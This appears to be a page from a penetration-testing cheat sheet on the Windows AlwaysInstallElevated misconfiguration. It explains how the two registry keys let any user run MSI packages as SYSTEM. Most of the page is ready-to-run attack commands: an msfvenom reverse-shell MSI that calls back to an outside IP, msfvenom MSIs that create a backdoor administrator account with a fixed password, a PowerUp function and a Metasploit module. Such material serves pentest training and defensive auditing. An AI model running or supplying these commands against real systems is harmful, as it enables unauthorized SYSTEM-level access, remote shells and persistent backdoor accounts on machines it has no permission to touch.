AlwaysInstalledElevated

Windows systems are affected by a privilege escalation vulnerability when the registry keys HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated are both set to 1. This misconfiguration allows any local user to execute Windows Installer (.msi) packages with elevated privileges. Exploitation is achieved by generating a malicious .msi payload and executing it through msiexec, which results in code execution as SYSTEM.

There are various ways to exploit this misconfiguration:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f msi -o revshell.msi

Create an admin user:

# Create an admin user (No UAC format)
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi

# Create an admin user (Using the msiexec the uac wont be prompted)
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi

# PowerUp
Write-UserAddMSI

If you have a meterpreter session you can automate this technique using the module:

> use exploit/windows/local/always_install_elevated

PreviousApps NextArgus Surveillance DVR

Last updated 1 month ago

Was this helpful?